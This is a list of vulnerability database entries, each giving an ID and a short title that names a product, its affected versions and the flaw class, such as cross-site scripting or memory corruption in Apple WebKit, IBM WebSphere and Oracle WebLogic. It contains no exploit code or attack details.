[132438] CMS Made Simple 2.2.10 News Module moduleinterface.php cross site scripting
[132416] Apple iCloud up to 7.10 on Windows WebKit Universal cross site scripting
[132415] Apple iCloud up to 7.10 on Windows WebKit Memory privilege escalation
[132414] Apple iCloud up to 7.10 on Windows WebKit privilege escalation
[132413] Apple iCloud up to 7.10 on Windows WebKit memory corruption
[132412] Apple iCloud up to 7.10 on Windows WebKit memory corruption
[132411] Apple iCloud up to 7.10 on Windows WebKit memory corruption
[132410] Apple iCloud up to 7.10 on Windows WebKit memory corruption
[132409] Apple iCloud up to 7.10 on Windows WebKit information disclosure
[132408] Apple iCloud up to 7.10 on Windows WebKit memory corruption
[132407] Apple iCloud up to 7.10 on Windows WebKit memory corruption
[132406] Apple iCloud up to 7.10 on Windows WebKit memory corruption
[132405] Apple iCloud up to 7.10 on Windows WebKit memory corruption
[132404] Apple iCloud up to 7.10 on Windows WebKit memory corruption
[132403] Apple iCloud up to 7.10 on Windows WebKit memory corruption
[132402] Apple iCloud up to 7.10 on Windows WebKit memory corruption
[132401] Apple iCloud up to 7.10 on Windows WebKit memory corruption
[132400] Apple iCloud up to 7.10 on Windows WebKit privilege escalation
[132318] Apple tvOS up to 12.1.2 WebKit Memory privilege escalation
[132317] Apple tvOS up to 12.1.2 WebKit privilege escalation
[132316] Apple tvOS up to 12.1.2 WebKit privilege escalation
[132315] Apple tvOS up to 12.1.2 WebKit memory corruption
[132314] Apple tvOS up to 12.1.2 WebKit memory corruption
[132313] Apple tvOS up to 12.1.2 WebKit memory corruption
[132312] Apple tvOS up to 12.1.2 WebKit memory corruption
[132311] Apple tvOS up to 12.1.2 WebKit information disclosure
[132310] Apple tvOS up to 12.1.2 WebKit memory corruption
[132309] Apple tvOS up to 12.1.2 WebKit memory corruption
[132308] Apple tvOS up to 12.1.2 WebKit memory corruption
[132307] Apple tvOS up to 12.1.2 WebKit memory corruption
[132306] Apple tvOS up to 12.1.2 WebKit memory corruption
[132305] Apple tvOS up to 12.1.2 WebKit memory corruption
[132304] Apple tvOS up to 12.1.2 WebKit memory corruption
[132303] Apple tvOS up to 12.1.2 WebKit memory corruption
[132302] Apple tvOS up to 12.1.2 WebKit memory corruption
[132301] Apple tvOS up to 12.1.2 WebKit Universal cross site scripting
[132217] IBM WebSphere Application Server 7.0/8.0/8.5/9.0 Request Header denial of service
[132175] ovirt-engine up to 4.1 REST Interface Password privilege escalation
[132150] CMS Made Simple 2.2.10 New Profile moduleinterface.php cross site scripting
[132079] Veritas NetBackup Appliance up to 3.1.2 Web Console Password privilege escalation
[132078] Veritas NetBackup Appliance up to 3.1.2 Web Console Password privilege escalation
[131964] PHP Scripts Mall Chartered Accountant : Auditor Website 2.0.1 assets/ directory traversal
[131963] PHP Scripts Mall Chartered Accountant : Auditor Website 2.0.1 Javascript memory corruption
[131962] PHP Scripts Mall Chartered Accountant : Auditor Website 2.0.1 privilege escalation
[131957] PHP Scripts Mall Website Seller Script 2.0.5 URL Path directory traversal
[131914] Webmin 1.890 /config.cgi cross site scripting
[131901] IBM WebSphere MQ up to 9.1.0.1 Web UI cross site scripting
[131853] Schneider Electric Modicon BMXNOC0401 PCL Web Server Remote File Inclusion privilege escalation
[131780] IBM Rational Quality Manager up to 5.x/6.0.6 Web UI cross site scripting
[131779] IBM Rational Quality Manager up to 5.x/6.0.6 Web UI cross site scripting
[131778] IBM Rational Quality Manager up to 5.x/6.0.6 Web UI cross site scripting
[131777] IBM Rational Quality Manager up to 5.x/6.0.6 Web UI cross site scripting
[131773] IBM Rational Quality Manager up to 5.x/6.0.6 Web UI cross site scripting
[131772] IBM Rational Quality Manager up to 5.x/6.0.6 Web UI cross site scripting
[131770] IBM Rational Quality Manager up to 5.x/6.0.6 Web UI cross site scripting
[131702] F5 BIG-IP/Enterprise Manager Traffic Management User Interface privilege escalation
[131701] F5 BIG-IP/Enterprise Manager Traffic Management User Interface privilege escalation
[131556] IBM WebSphere up to 9.1.1 Multiplexed Channel privilege escalation
[131553] IBM WebSphere Application Server 7.0/8.0/8.5/9.0 Connection information disclosure
[131414] Webmin 1.900 Java File Manager /updown/upload.cgi privilege escalation
[131398] IBM WebSphere Application Server 8.5/9.0 Web UI cross site scripting
[131350] PSI GridConnect GmbH Telecontrol Gateway Web Application Browser privilege escalation
[131343] IBM Sterling B2B Integrator up to 6.0.0.0 Web UI cross site scripting
[131342] IBM Sterling B2B Integrator up to 6.0.0.0 Web UI cross site scripting
[131341] IBM Sterling B2B Integrator up to 6.0.0.0 Web UI cross site scripting
[131221] F5 BIG-IP Access Policy Manager 11.5.x/11.6.x Admin Web UI cross site scripting
[131203] Cisco WebEx Teams 3.13.26920 on iOS Client Application privilege escalation
[131142] PHP Scripts Mall Auction Website Script 2.0.4 privilege escalation
[131095] MDaemon Webmail up to 18.5.1 cross site scripting
[131094] MDaemon Webmail up to 18.5.1 cross site scripting
[131091] Drupal up to 8.5.10/8.6.9 RESTful Web Services privilege escalation
[131071] IBM Security Identity Governance/Intelligence up to 5.2.4.1 Web UI cross site scripting
[131065] Splunk Enterprise/Light Web Persistent cross site scripting
[131000] IBM WebSphere Application Server 7.0/8.0/8.5/9.0 TLS Configuration information disclosure
[130901] IBM InfoSphere Information Server 11.3/11.5/11.7 Web UI cross site scripting
[130887] F5 BIG-IP up to 11.6.3.2/12.1.3.7/13.1.1.3/14.0.0.2 Traffic Management User Interface Reflected cross site scripting
[130858] D-Link DIR-878 1.12A1 HNAP API /HNAP1 SetWebFilterSettings privilege escalation
[130850] Joomla CMS up to 3.9.2 Web Server Configuration cross site scripting
[130845] AVEVA InduSoft Web Studio/InTouch Edge HMI Database Connection unknown vulnerability
[130844] AVEVA InduSoft Web Studio/InTouch Edge HMI weak authentication
[130681] Cisco Web Security Appliance 10.1.x/10.5.x Decryption Policy Default Action denial of service
[130639] Cisco Webex Business Suite up to 3.0.8 privilege escalation
[130569] Advantech WebAccess SCADA 8.3 SQL Command sql injection
[130568] Advantech WebAccess SCADA 8.3 weak authentication
[130567] Advantech WebAccess SCADA 8.3 weak authentication
[130487] ZoneMinder up to 1.32.3 web/skins/classic/views Reflected cross site scripting
[130441] FreeBSD CVSWeb 2.x cross site scripting
[130331] Comodo UTM Firewall up to 2.6.x Web Console weak authentication
[130269] Calmar Webmedia Total Donations Plugin up to 2.0.5 on WordPress Access Control migla_ajax_functions.php privilege escalation
[130220] Cisco WebEx Network Recording Player/Webex Player on Windows memory corruption
[130219] Cisco WebEx Network Recording Player/Webex Player on Windows memory corruption
[130218] Cisco WebEx Network Recording Player/Webex Player on Windows memory corruption
[130217] Cisco WebEx Network Recording Player/Webex Player on Windows memory corruption
[130216] Cisco WebEx Network Recording Player/Webex Player on Windows memory corruption
[130215] Cisco Webex Teams Client URI privilege escalation
[130125] Jenkins up to 2.145 Stapler Web Framework Facet.java directory traversal
[130120] Apple macOS WebRTC memory corruption
[130097] Apple iCloud up to 7.9 on Windows WebKit Universal cross site scripting
[130096] Apple iCloud up to 7.9 on Windows WebKit memory corruption
[130095] Apple iCloud up to 7.9 on Windows WebKit memory corruption
[130094] Apple iCloud up to 7.9 on Windows WebKit memory corruption
[130093] Apple iCloud up to 7.9 on Windows WebKit memory corruption
[130092] Apple iCloud up to 7.9 on Windows WebKit memory corruption
[130091] Apple iCloud up to 7.9 on Windows WebKit memory corruption
[130090] Apple iCloud up to 7.9 on Windows WebKit memory corruption
[130089] Apple iCloud up to 7.9 on Windows WebKit privilege escalation
[130075] Apple watchOS up to 5.1.2 WebKit memory corruption
[130074] Apple watchOS up to 5.1.2 WebKit memory corruption
[130073] Apple watchOS up to 5.1.2 WebKit memory corruption
[130072] Apple watchOS up to 5.1.2 WebKit memory corruption
[130058] Apple tvOS up to 12.1.1 WebKit memory corruption
[130057] Apple tvOS up to 12.1.1 WebKit memory corruption
[130056] Apple tvOS up to 12.1.1 WebKit memory corruption
[130055] Apple tvOS up to 12.1.1 WebKit memory corruption
[130054] Apple tvOS up to 12.1.1 WebKit privilege escalation
[130053] Apple tvOS up to 12.1.1 WebKit Universal cross site scripting
[130052] Apple tvOS up to 12.1.1 WebKit memory corruption
[130051] Apple tvOS up to 12.1.1 WebKit memory corruption
[130050] Apple tvOS up to 12.1.1 WebKit memory corruption
[129766] Juniper Junos Management Interface privilege escalation
[129619] Oracle JD Edwards EnterpriseOne Tools 9.2 Web Runtime SEC privilege escalation
[129595] Oracle WebLogic Server 10.3.6.0/12.1.3.0/12.2.1.3 WLS Deployment privilege escalation
[129593] Oracle WebLogic Server 12.2.1.3 Application Container JavaEE privilege escalation
[129592] Oracle WebCenter Portal 11.1.1.9.0/12.2.1.3.0 WebCenter Spaces Application privilege escalation
[129573] Oracle WebLogic Server 10.3.6.0 Apache HTTP Server privilege escalation
[129572] Oracle WebLogic Server 12.1.3.0/12.2.1.3 jQuery cross site scripting
[129571] Oracle WebCenter Sites 11.1.1.8.0 Jython cross site scripting
[129568] Oracle WebLogic Server 10.3.6.0/12.1.3.0/12.2.1.3 AntiSamy privilege escalation
[129564] Oracle WebLogic Server 10.3.6.0/12.1.3.0/12.2.1.3 Spring Framework privilege escalation
[129558] Oracle WebLogic Server 12.2.1.3 AntiSamy weak encryption
[129557] Oracle WebCenter Portal 11.1.1.9.0/12.2.1.3.0 AntiSamy weak encryption
[129540] Oracle WebCenter Portal 12.2.1.3.0 AntiSamy privilege escalation
[129539] Oracle WebLogic Server 12.2.1.3 jQuery XML External Entity
[129486] Oracle Communications WebRTC Session Controller up to 7.1 jQuery FileUpload Key Management Error
[129483] Oracle Communications WebRTC Session Controller up to 7.1 OpenSSL cross site scripting
[129480] Oracle Communications WebRTC Session Controller up to 7.1 Apache Batik privilege escalation
[129478] Oracle Communications WebRTC Session Controller up to 7.1 libgcrypt information disclosure
[129477] Oracle Communications WebRTC Session Controller up to 7.1 cURL memory corruption
[129476] Oracle Communications WebRTC Session Controller up to 7.1 Bouncy Castle Java Library weak encryption
[129472] Oracle Communications WebRTC Session Controller up to 7.1 Apache Struts 1 memory corruption
[129463] Oracle Communications WebRTC Session Controller up to 7.1 Apache Log4j privilege escalation
[129151] IBM Security Identity Manager 6.0.0 Web UI cross site scripting
[129002] Cisco Webex Business Suite MyWebex cross site scripting
[128989] Cisco IP Phone 8800 User Interface privilege escalation
[128981] McAfee Web Gateway 7.8.2.0 privilege escalation
[128778] SAP CRM WebClient UI cross site scripting
[128777] SAP CRM WebClient UI cross site scripting
[128766] IBM Jazz Reporting Service 6.0.3/6.0.4/6.0.5/6.0.6 Web UI cross site scripting
[128713] Apache Thrift Node.js Static Web Server up to 0.11.0 information disclosure
[128691] Webroot BrightCloud SDK Header bc_http_read_header memory corruption
[128498] PHP Scripts Mall Website Seller Script 2.0.5 Profile cross site scripting
[128112] Advantech WebAccess SCADA 8.3.2 on Windows 2008 privilege escalation
[128100] Webroot BrightCloud SDK HTTP Client weak authentication
[128082] Modicon M340/Premium/Quantum PLC/BMXNOR0200 Embedded Web Server privilege escalation
[128081] Modicon M340/Premium/Quantum PLC/BMXNOR0200 Embedded Web Server information disclosure
[128080] Modicon M340/Premium/Quantum PLC/BMXNOR0200 Embedded Web Server Redirect
[128033] Bosch IP Camera 6.32 Network Interface memory corruption
[128032] IBM Security Guardium 10.0/10.5 Web UI cross site scripting
[128031] IBM Security Guardium 10.0/10.5 Web UI cross site scripting
[127986] IBM Business Automation Workflow 18.0.0.0/18.0.0.1 Web UI cross site scripting
[127959] IBM Security Guardium 10/10.5 Web UI cross site scripting
[127958] IBM Security Access Manager Appliance 9.0.1.0/9.0.2.0/9.0.3.0/9.0.4.0/9.0.5.0 Web UI cross site scripting
[127949] IBM Security Access Manager Appliance 9.0.1.0/9.0.2.0/9.0.3.0/9.0.4.0/9.0.5.0 Web UI cross site scripting
[127942] IBM Security Access Manager Appliance 9.0.1.0/9.0.2.0/9.0.3.0/9.0.4.0/9.0.5.0 Web UI cross site scripting
[127936] Siemens SIMATIC HMI Comfort Panel Webserver Header Injection privilege escalation
[127935] Siemens SIMATIC HMI Comfort Panel Webserver Redirect
[127912] IBM WebSphere Application Server 7.0/8.0/8.5/9.0 Admin Console cross site request forgery
[127911] IBM WebSphere Application Server 8.5/9.0 privilege escalation
[127877] SAP NetWeaver AS JAVA up to 7.50 Web Container cross site scripting
[127862] IBM WebSphere Application Server 7.0/8.0/8.5/9.0 Java privilege escalation
[127861] IBM Curam Social Program Management 6.0.5/6.1.1/6.2.0/7.0.1/7.0.3 Web UI cross site scripting
[127774] Jenkins up to 2.153/LTS 2.138.3 Stapler Web Framework MetaClass.java privilege escalation
[127759] VeryNginx 0.3.3 Web Application Firewall 7PK Security Features
[127656] Moxa NPort W2x50A up to 2.1 Web Server webSettingProfileSecurity privilege escalation
[127655] Moxa NPort W2x50A up to 2.1 Web Server net_WebPingGetValue privilege escalation
[127653] IBM 3.0.0/3.0.2/3.0.5 Web UI cross site scripting
[127651] Amazon Web Services FreeRTOS xProcessReceivedTCPPacket information disclosure
[127650] Amazon Web Services FreeRTOS DHCP Response information disclosure
[127649] Amazon Web Services FreeRTOS IP Header prvProcessIPPacket memory corruption
[127648] Amazon Web Services FreeRTOS ARP Packet eARPProcessPacket information disclosure
[127647] Amazon Web Services FreeRTOS NBNS Packet prvTreatNBNS information disclosure
[127646] Amazon Web Services FreeRTOS DNS Response xProcessReceivedUDPPacket/prvParseDNSReply privilege escalation
[127644] Amazon Web Services FreeRTOS prvProcessICMPPacket information disclosure
[127643] Amazon Web Services FreeRTOS Protocol Checksum Generator usGenerateProtocolChecksum/prvProcessIPPacket memory corruption
[127642] Amazon Web Services FreeRTOS DNS LLMNR Packet prvParseDNSReply memory corruption
[127641] Amazon Web Services FreeRTOS TCP Options prvCheckOptions information disclosure
[127640] Amazon Web Services FreeRTOS prvCheckOptions denial of service
[127634] Apple iCloud up to 7.8.1 on Windows WebKit memory corruption
[127633] Apple iCloud up to 7.8.1 on Windows WebKit memory corruption
[127632] Apple iCloud up to 7.8.1 on Windows WebKit memory corruption
[127631] Apple iCloud up to 7.8.1 on Windows WebKit memory corruption
[127630] Apple iCloud up to 7.8.1 on Windows WebKit memory corruption
[127629] Apple iCloud up to 7.8.1 on Windows WebKit memory corruption
[127596] Apple tvOS up to 12.1 WebKit memory corruption
[127595] Apple tvOS up to 12.1 WebKit memory corruption
[127594] Apple tvOS up to 12.1 WebKit memory corruption
[127593] Apple tvOS up to 12.1 WebKit memory corruption
[127592] Apple tvOS up to 12.1 WebKit memory corruption
[127591] Apple tvOS up to 12.1 WebKit memory corruption
[127533] IBM QRadar SIEM 7.2/7.3 Web UI cross site scripting
[127516] SCADA Webserver up to 2.03 Reflected cross site scripting
[127413] IBM WebSphere Application Server 8.5/9.0 Security Domain privilege escalation
[127375] Modicon M340/Premium/Quantum PLCs/BMXNOR0200 Embedded Web Server cross site request forgery
[127374] Modicon M340/Premium/Quantum PLCs/BMXNOR0200 Embedded Web Server privilege escalation
[127373] Modicon M340/Premium/Quantum PLCs/BMXNOR0200 Embedded Web Server privilege escalation
[127372] Modicon M340/Premium/Quantum PLCs/BMXNOR0200 Embedded Web Server cross site scripting
[127371] Modicon M340/Premium/Quantum PLCs/BMXNOR0200 Embedded Web Server privilege escalation
[127269] IBM Maximo Asset Management 7.6 Web UI cross site scripting
[127224] NUOO CMS up to 3.3 Web Server sql injection
[127208] Fortinet FortiOS up to 5.2/5.4.7/5.6.3 Web Pages denial of service
[127198] TerraMaster TOS 3.1.03 Web Application Session Token information disclosure
[127195] TerraMaster TOS 3.1.03 Web Application Taskbar cross site scripting
[127129] IBM WebSphere Application Server up to 9.0.0.9 XML Data XML External Entity
[126926] IBM WebSphere Application Server 7.0/8.0/8.5/9.0 Installation Verification cross site scripting
[126772] SAP Business Intelligence 4.1/4.2 Web Intelligence Richclient 3 Data Processing Error
[126770] IBM WebSphere Commerce up to 9.0.0.6 privilege escalation
[126652] IBM WebSphere Application Server 7.0/8.0/8.5/9.0 SIBMsgMigration Utility cross site scripting
[126628] Squid Web Proxy up to 4.3 SNMP denial of service
[126627] Squid Web Proxy up to 4.3 X.509 Certificate cross site scripting
[126617] IBM Maximo Asset Management 7.6 Web UI cross site scripting
[126605] IBM WebSphere MQ up to 8.x/9.1 MQTT privilege escalation
[126587] Cisco Prime Collaboration Assurance Web-based UI privilege escalation
[126418] InduSoft Web Studio/Aveva InTouch Edge HMI memory corruption
[126417] InduSoft Web Studio/Aveva InTouch Edge HMI privilege escalation
[126372] IBM WebSphere Application Server Liberty RP Service privilege escalation
[126368] Advantech WebAccess 8.3.1/8.3.2 Bwmainleft.asp cross site scripting
[126367] Advantech WebAccess 8.3.1/8.3.2 WADashboard API directory traversal
[126366] Advantech WebAccess 8.3.1/8.3.2 WADashboard API directory traversal
[126258] Apple iCloud up to 7.7 on Windows WebKit memory corruption
[126257] Apple iCloud up to 7.7 on Windows WebKit denial of service
[126256] Apple iCloud up to 7.7 on Windows WebKit memory corruption
[126255] Apple iCloud up to 7.7 on Windows WebKit memory corruption
[126254] Apple iCloud up to 7.7 on Windows WebKit memory corruption
[126253] Apple iCloud up to 7.7 on Windows WebKit memory corruption
[126252] Apple iCloud up to 7.7 on Windows WebKit memory corruption
[126251] Apple iCloud up to 7.7 on Windows WebKit memory corruption
[126250] Apple iCloud up to 7.7 on Windows WebKit memory corruption
[126249] Apple iCloud up to 7.7 on Windows WebKit memory corruption
[126230] Apple watchOS up to 5.0.1 WebKit memory corruption
[126229] Apple watchOS up to 5.0.1 WebKit memory corruption
[126228] Apple watchOS up to 5.0.1 WebKit memory corruption
[126227] Apple watchOS up to 5.0.1 WebKit memory corruption
[126226] Apple watchOS up to 5.0.1 WebKit memory corruption
[126225] Apple watchOS up to 5.0.1 WebKit memory corruption
[126224] Apple watchOS up to 5.0.1 WebKit memory corruption
[126223] Apple watchOS up to 5.0.1 WebKit memory corruption
[126222] Apple watchOS up to 5.0.1 WebKit memory corruption
[126209] Apple tvOS up to 12.0 WebKit memory corruption
[126208] Apple tvOS up to 12.0 WebKit denial of service
[126207] Apple tvOS up to 12.0 WebKit memory corruption
[126206] Apple tvOS up to 12.0 WebKit memory corruption
[126205] Apple tvOS up to 12.0 WebKit memory corruption
[126204] Apple tvOS up to 12.0 WebKit memory corruption
[126203] Apple tvOS up to 12.0 WebKit memory corruption
[126121] Advantech WebAccess 8.3.2 memory corruption
[126118] IBM WebSphere Application Server 7.0/8.0/8.5/9.0 Cachemonitor cross site scripting
[125927] IBM WebSphere Commerce Enterprise 7.x/8.x/9.x Web UI cross site scripting
[125913] Splunk Enterprise up to <=6.0.13 Web cross site scripting
[125899] Axios Italia Axioscloud Sissiweb Registro Elettronico 1.7.0 secret/relogoff.aspx cross site scripting
[125880] Advantech WebAccess up to 8.3.1 DLL File privilege escalation
[125879] Advantech WebAccess up to 8.3.1 memory corruption
[125878] Advantech WebAccess up to 8.3.1 directory traversal
[125841] Advantech WebAccess up to 8.3.2 opcImg.asp memory corruption
[125840] Advantech WebAccess up to 8.3.2 Reflected cross site scripting
[125697] Linksys E1200/E2500 Web Portal apply.cgi machine_name privilege escalation
[125696] Linksys E1200/E2500 Web Portal apply.cgi start_lltd privilege escalation
[125593] Oracle MICROS Relate CRM Software 10.8/11.4 Web Services privilege escalation
[125527] Oracle JD Edwards EnterpriseOne Tools 9.2 Web Runtime privilege escalation
[125487] Oracle WebLogic Server 10.3.6.0/12.1.3.0 Console information disclosure
[125484] Oracle WebCenter Portal 11.1.1.9.0/12.2.1.3.0 WebCenter Spaces Application privilege escalation
[125481] Oracle WebLogic Server 10.3.6.0 WLS - Web Services privilege escalation
[125480] Oracle WebCenter Sites 11.1.1.8.0 Advanced UI cross site scripting
[125476] Oracle WebLogic Server 10.3.6.0 WLS - Web Services privilege escalation
[125475] Oracle WebLogic Server 10.3.6.0 WLS - Web Services privilege escalation
[125474] Oracle WebCenter Sites 11.1.1.8.0/12.2.1.3.0 Advanced UI privilege escalation
[125472] Oracle WebCenter Sites 11.1.1.8.0 Advanced UI privilege escalation
[125446] Oracle WebLogic Server Docker Images privilege escalation
[125445] Oracle WebLogic Server 12.1.3.0/12.2.1.3 WLS - Web Services privilege escalation
[125443] Oracle HTTP Server 12.2.1.3 Web Listener memory corruption
[125436] Oracle WebLogic Server 10.3.6.0/12.1.3.0/12.2.1.3 Spring Framework privilege escalation
[125434] Oracle WebLogic Server 10.3.6.0/12.1.3.0/12.2.1.3 WLS Core Components privilege escalation
[125433] Oracle WebLogic Server 10.3.6.0/12.1.3.0/12.2.1.3 WLS Core Components privilege escalation
[125432] Oracle WebLogic Server 12.2.1.3 WLS Core Components privilege escalation
[125431] Oracle WebLogic Server 12.1.3.0 WLS Core Components privilege escalation
[125430] Oracle WebLogic Server 10.3.6.0/12.1.3.0/12.2.1.3 WLS Core Components privilege escalation
[125421] Oracle Hospitality Materials Control 18.1 MobileAuthWebService cross site scripting
[125358] IBM WebSphere Application Server 7.0/8.0/8.5/9.0 Web UI cross site scripting
[125302] CMS Made Simple 2.2.7 Article moduleinterface.php cross site scripting
[125301] CMS Made Simple 2.2.7 Article moduleinterface.php cross site scripting
[125274] IBM WebSphere Application Server 7.0/8.0/8.5/9.0 directory traversal
[125271] IBM WebSphere Application Server 8.5/9.0 IBM Cloud Password information disclosure
[125267] IBM WebSphere Portal 7.0/8.0/8.5/9.0 Web UI cross site scripting
[125248] Apache ActiveMQ up to 5.15.5 Web-based Administration Console queue.jsp cross site scripting
[125215] Intel Rapid Web Server 3 information disclosure
[125210] Juniper Junos up to 17.3R3 Management Interface denial of service
[125209] Juniper Junos J-Web Service privilege escalation
[125206] Juniper ScreenOS up to 6.3.0r25 Graphical User Interface Persistent cross site scripting
[125201] Juniper Junos on QFX5000/EX4600 Management Interface denial of service
[125181] SAP Business Intelligence 4.10/4.20 Web Intelligence DHTML Client cross site scripting
[125095] Microsoft Exchange Server 2013 CU21/2016 CU10 Outlook Web Access privilege escalation
[124944] IBM 10 Web UI cross site scripting
[124941] IBM Maximo Asset Management 7.6.0/7.6.1/7.6.2/7.6.3 Web UI cross site scripting
[124933] Cisco WebEx Network Recording Player on Windows ARF File privilege escalation
[124924] Cisco WebEx Network Recording Player on Windows ARF File privilege escalation
[124923] Cisco WebEx Network Recording Player on Windows ARF File privilege escalation
[124922] Cisco WebEx Network Recording Player on Windows ARF File privilege escalation
[124921] Cisco WebEx Network Recording Player on Windows ARF File privilege escalation
[124920] Cisco WebEx Network Recording Player on Windows ARF File privilege escalation
[124919] Cisco WebEx Network Recording Player on Windows ARF File privilege escalation
[124918] Cisco WebEx Network Recording Player on Windows ARF File privilege escalation
[124917] Cisco WebEx Network Recording Player on Windows ARF File privilege escalation
[124916] Cisco WebEx Network Recording Player on Windows ARF File privilege escalation
[124915] Cisco WebEx Network Recording Player on Windows ARF File privilege escalation
[124914] Cisco WebEx Network Recording Player on Windows ARF File privilege escalation
[124913] Cisco WebEx Network Recording Player on Windows ARF File memory corruption
[124912] Cisco WebEx Network Recording Player on Windows ARF File memory corruption
[124911] Cisco WebEx Network Recording Player on Windows ARF File privilege escalation
[124910] Cisco WebEx Network Recording Player on Windows ARF File privilege escalation
[124890] Cisco Prime Infrastructure HTTP Web Server privilege escalation
[124862] Cisco IOS XE Web Framework denial of service
[124851] Cisco WebEx Player denial of service
[124835] Cisco WebEx Teams privilege escalation
[124822] Cisco Secure Access Control Server Web UI XML External Entity
[124821] Cisco RV180W/RV220W Web Framework directory traversal
[124820] Cisco RV180W/RV220W Web Framework SQL sql injection
[124802] PHP Scripts Mall Website Seller Script 2.0.5 Keyword cross site scripting
[124798] IBM Rational Quality Manager up to 6.0.6 Web UI cross site scripting
[124797] IBM Rational Quality Manager up to 6.0.6 Web UI cross site scripting
[124796] IBM Rational Quality Manager up to 6.0.6 Web UI cross site scripting
[124795] MediaWiki Web Access 1.31.0 .htaccess information disclosure
[124765] IBM WebSphere Application Server 7.0/8.0/8.5/9.0 Oauth cross site scripting
[124763] IBM WebSphere Application Server 7.0/8.0/8.5/9.0 SAML cross site scripting
[124759] Naviwebs Navigate CMS 2.8 File Upload navigate_upload.php privilege escalation
[124758] Naviwebs Navigate CMS 2.8 login.php sql injection
[124695] IBM Rational Quality Manager up to 6.0.6 Web UI cross site scripting
[124694] IBM Rational Quality Manager up to 6.0.6 Web UI cross site scripting
[124693] IBM Rational Quality Manager up to 6.0.6 Web UI cross site scripting
[124692] IBM Rational Quality Manager up to 6.0.6 Web UI cross site scripting
[124687] IBM Rational Quality Manager up to 6.0.6 Web UI cross site scripting
[124685] IBM Rational Quality Manager up to 6.0.6 Web UI cross site scripting
[124680] IBM Rational Quality Manager up to 6.0.6 Web UI cross site scripting
[124679] IBM Rational Quality Manager up to 6.0.6 Web UI cross site scripting
[124678] IBM Rational Quality Manager up to 6.0.6 Web UI cross site scripting
[124677] IBM Rational Quality Manager up to 6.0.6 Web UI cross site scripting
[124676] IBM Rational Quality Manager up to 6.0.6 Web UI cross site scripting
[124675] IBM Rational Quality Manager up to 6.0.6 Web UI cross site scripting
[124668] IBM Rational Quality Manager up to 6.0.6 Web UI cross site scripting
[124653] IBM WebSphere Portal 7.0/8.0/8.5/9.0 weak authentication
[124642] IBM WebSphere Portal 7.0/8.0/8.5/9.0 Access Control privilege escalation
[124557] IBM WebSphere Portal 8.0/8.5/9.0 Web UI cross site scripting
[124542] IBM WebSphere Portal 7.0/8.0/8.5/9.0 Redirect
[124541] IBM WebSphere Portal 7.0/8.0/8.5/9.0 Web UI cross site scripting
[124537] IBM WebSphere Portal 7.0/8.0/8.5/9.0 Web UI cross site scripting
[124532] CMS ISWEB 3.5.3 moduli/downloadFile.php directory traversal
[124531] CMS ISWEB 3.5.3 sql injection
[124492] IBM WebSphere Application Server Liberty 145455 ORB Communication information disclosure
[124482] pfSense up to 2.4.2 status_interfaces.php dhcp_relinquish_lease privilege escalation
[124436] Asterisk PBX up to 13.23.0/14.7.7/15.6.0 res_http_websocket.so denial of service
[124371] Microsoft Exchange Server up to 2010 SP3 Outlook Web Access /owa/auth/logon.aspx privilege escalation
[124308] Moxa EDR-810 4.2 Build 18041013 net_WebCADELETEGetValue privilege escalation
[124236] Foscam C1 Indoor HD Camera 2.52.2.43 Multi-Camera Interface privilege escalation
[124235] Foscam C1 Indoor HD Camera 2.52.2.43 Multi-Camera Interface memory corruption
[124234] Foscam C1 Indoor HD Camera 2.52.2.43 Multi-Camera Interface memory corruption
[124160] Oracle WebCenter Interaction 10.3.3 Username information disclosure
[124159] Oracle WebCenter Interaction Portal 10.3.3 Session Cookie httponly 7PK Security Features
[124158] Oracle WebCenter Interaction 10.3.3 Search Service queryd.exe weak authentication
[124157] Oracle WebCenter Interaction 10.3.3 AjaxControl privilege escalation
[124156] Oracle WebCenter Interaction 10.3.3 login Reflected cross site scripting
[124155] Oracle WebCenter Interaction 10.3.3 login Redirect
[124154] Oracle WebCenter Interaction 10.3.3 portalpages.dll DisplayResponse Reflected cross site scripting
[124153] Oracle WebCenter Interaction 10.3.3 cross site request forgery
[124062] IBM WebSphere Application Server 8.5/9.0 TLS information disclosure
[123923] SAP WebDynpro Java 7.20/7.30/7.31/7.40/7.50 Stored cross site scripting
[123921] SAP NetWeaver BI 7.30/7.31/7.40/7.41/7.50 BEx Web Java Runtime Export Web Service privilege escalation
[123797] PowerDNS Authoritative Server up to 3.4.10/4.0.1 Web Server denial of service
[123734] IBM WebSphere Application Server 7.0/8.0/8.5/9.0 SOAP Connector privilege escalation
[123697] Information Builders WebFOCUS Business Intelligence 8.1 privilege escalation
[123665] IBM WebSphere Application Server 7.0/8.0/8.5.5 Form Login privilege escalation
[123372] CMS ISWEB 3.5.3 index.php cross site scripting
[123340] PHP Scripts Mall Website Seller Script 2.0.5 memory corruption
[123339] PHP Scripts Mall Website Seller Script 2.0.5 cross site scripting
[123290] IBM WebSphere Commerce up to <=7.0.0.0 FP8 information disclosure
[123286] A10 ACOS Web Application Firewall up to 2.7.0/2.7.2-P11/4.1.0-P10/4.1.1-P7/4.1.2-P3 SQL Injection sql injection
[123257] D-Link DIR-615 20.07 Web UI cross site scripting
[123200] IBM WebSphere Application Server Liberty JASPIC information disclosure
[123165] GitHub Electron 1.7.15/1.8.7/2.0.7/3.0.0-beta.6 WebPreferences 7PK Security Features
[123158] MikroTik RouterOS up to 6.40.8/6.42.6 License Upgrade Interface memory corruption
[122989] IBM Maximo Asset Management 7.6.0/7.6.1/7.6.2/7.6.3 Web UI cross site scripting
[122969] OpenEMR up to 5.0.1.3 interface/fax/faxq.php privilege escalation
[122939] Cisco AsyncOS/Web Security Appliance Proxy denial of service
[122907] SAP HANA Extended Application Services 1 XS Command-Line Interface privilege escalation
[122903] SAP Business Intelligence 4.2 Launchpad Web Intelligence sql injection
[122820] Hikvision IP Camera Web Server memory corruption
[122772] PHP Scripts Mall Chartered Accountant : Auditor Website 2.0.1 updprofile.php cross site request forgery
[122691] IBM WebSphere MQ up to 9.0.0.3 privilege escalation
[122667] IBM Jazz Foundation up to 6.0.5 Web UI cross site scripting
[122580] SoftNAS Cloud up to 4.0.2 Web Administration Console privilege escalation
[122564] IBM Maximo Asset Management 7.6 Web UI cross site scripting
[122531] Apache Tomcat up to 7.0.88/8.0.52/8.5.31/9.0.9 WebSocket Client weak authentication
[122445] IBM Sterling B2B Integrator Standard Edition up to 5.2.6.3 Web UI cross site scripting
[122336] Foreman 1.5.1 Web UI Stored cross site scripting
[122239] GitLab Community Edition/Enterprise Edition up to 10.8.6/11.0.4/11.1.1 Web DIE File Commit cross site scripting
[122123] Atlassian JIRA up to 7.6.6/7.10.x Webhooks information disclosure
[122106] Jenkins up to 2.121.1/2.132 Stapler Web Framework Stapler.java privilege escalation
